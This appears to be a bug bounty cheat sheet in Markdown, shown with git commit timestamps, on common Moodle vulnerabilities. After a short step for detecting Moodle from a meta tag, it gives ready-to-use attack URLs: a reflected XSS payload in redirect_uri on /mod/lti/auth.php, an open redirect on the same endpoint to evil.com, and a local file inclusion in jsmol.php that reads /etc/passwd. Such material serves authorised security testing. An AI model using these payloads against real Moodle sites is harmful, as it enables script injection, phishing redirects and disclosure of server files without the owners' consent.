AllAboutBugBounty/Technologies/Moodle.md

24 lines
701 B
Markdown
Raw Normal View History

2022-06-18 13:26:55 +00:00
# Moodle Common Bugs
## Introduction
What would you do if you came across a website that uses Moodle?
## How to Detect
If you visit `https://target.com` and see the source code, you will see `<meta name="keywords" content="moodle,`
2021-07-21 15:38:57 +00:00
2022-06-15 10:38:42 +00:00
1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
2021-07-21 15:38:57 +00:00
```
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
```
2022-06-15 10:38:42 +00:00
2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter
2021-07-21 15:38:57 +00:00
```
2022-06-18 13:26:55 +00:00
https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
```
3. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter
```
https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
2021-07-21 15:38:57 +00:00
```